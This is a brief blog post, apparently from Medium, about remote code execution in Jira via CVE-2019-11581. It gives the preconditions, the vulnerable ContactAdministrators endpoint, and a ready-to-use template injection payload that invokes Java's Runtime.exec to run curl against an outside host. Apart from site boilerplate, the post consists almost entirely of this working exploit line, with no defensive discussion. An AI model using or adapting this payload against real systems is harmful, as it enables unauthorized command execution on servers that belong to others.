RCE in Jira(CVE-2019–11581)

  1. such functionality was turned on. It is turned off by default.
  2. Jira is not covered with ACL, firewall or SSO provider which prevents unauthenticated access.
https://jiraserver/secure/ContactAdministrators!default.jspa
$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://avtohanter.ru/rcetest?a=a').waitFor()

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ruvlol

ruvlol

More from Medium

An Out Of Scope domain Leads To a Critical Bug[$1500]

Recon — All In One, Fast, Easy Recon Tool (HydraRecon)

lets start

Intigriti — XSS Challenge — May 2022 — Bug Bounty Hunting — Writeup

A short story of IDOR